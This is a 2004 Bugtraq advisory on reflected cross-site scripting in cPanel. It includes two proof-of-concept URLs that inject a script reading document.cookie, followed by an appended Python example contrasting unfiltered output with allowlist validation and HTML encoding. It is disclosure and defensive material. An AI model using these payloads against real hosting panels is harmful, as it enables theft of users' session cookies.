More Cpanel Vuls (cross site scripting)

From: Fable (fable_at_hush.com)
Date: 03/23/04

    Date: 23 Mar 2004 17:39:07 -0000
    To: bugtraq@securityfocus.com

    ##################################################
    ##Advisory Name: More Cpanel Vuls (cross site scripting)
    #Discovered by: Fable
    #Greets: 0x29A Crew, !AM Crew, Atomix, d3thstar, mgrd, rootthief.com.
    #Version Tested On: cPanel Build 9.1.0-STABLE 93
    ##Most likely affects more
    ##################################################

    ############
    #Description
    ############

    cPanel & WebHost Manager (WHM) is a next generation web hosting control
    panel system. Both cPanel & WHM are extremely feature rich as well as
    include an easy to use web based interface.

    ##############
    #Vulnerability
    ##############

    After some looking into, I found out that cPanel uses little or no html filters
    in their product. It's very simple to inject html in multiple areas in cpanel.
    I'll list the ones I've found so far.

    http://site.com:2082/frontend/x/mail/dodelautores.html?email=<script>alert(document.cookie)</script>
    http://site.com:2082/frontend/x/mime/addhandle.html?ext=phpz&handle=<script>alert(document.cookie)</script>

    Note: Those should appear as < script > and < /script > without the spaces, of course.
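
Added example, not part of the original advisory and not cPanel's code: a Python illustration of the filtering the advisory says is missing, with the unfiltered echo beside a version that validates each parameter against an allowlist and HTML-encodes whatever it writes back. The page templates, validator patterns and function names are assumptions made for this example.

```python
import html
import re
from urllib.parse import parse_qs

# Hypothetical page fragments; the advisory does not show cPanel's real markup.
MAIL_TEMPLATE = "<p>Autoresponder for {email} deleted.</p>"
MIME_TEMPLATE = "<p>Handler {handle} added for extension {ext}.</p>"

# Allowlist patterns are assumptions for this example, not cPanel's rules.
VALIDATORS = {
    "email": re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}"),
    "ext": re.compile(r"\.?[A-Za-z0-9]{1,16}"),
}

def params(query_string, names):
    """First value of each named query parameter ('' when absent)."""
    parsed = parse_qs(query_string, keep_blank_values=True)
    return {n: parsed.get(n, [""])[0] for n in names}

def render_unfiltered(template, query_string, names):
    """The behaviour the advisory reports: values are echoed unchanged."""
    return template.format(**params(query_string, names))

def render_filtered(template, query_string, names):
    """Reject values failing their allowlist, HTML-encode everything echoed."""
    values = params(query_string, names)
    for name, value in values.items():
        pattern = VALIDATORS.get(name)
        if pattern is not None and not pattern.fullmatch(value):
            return 400, "<p>Invalid value for {}.</p>".format(html.escape(name))
    safe = {n: html.escape(v, quote=True) for n, v in values.items()}
    return 200, template.format(**safe)

# Query strings modelled on the two URLs in the advisory.
MAIL_QS = "email=<script>alert(document.cookie)</script>"
MIME_QS = "ext=phpz&handle=<script>alert(document.cookie)</script>"

if __name__ == "__main__":
    print(render_unfiltered(MAIL_TEMPLATE, MAIL_QS, ["email"]))
    print(render_filtered(MAIL_TEMPLATE, MAIL_QS, ["email"]))
    print(render_filtered(MIME_TEMPLATE, MIME_QS, ["ext", "handle"]))
```

The `email` value is rejected outright because it has a strict format, while the free-form `handle` value is kept but rendered as inert text.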

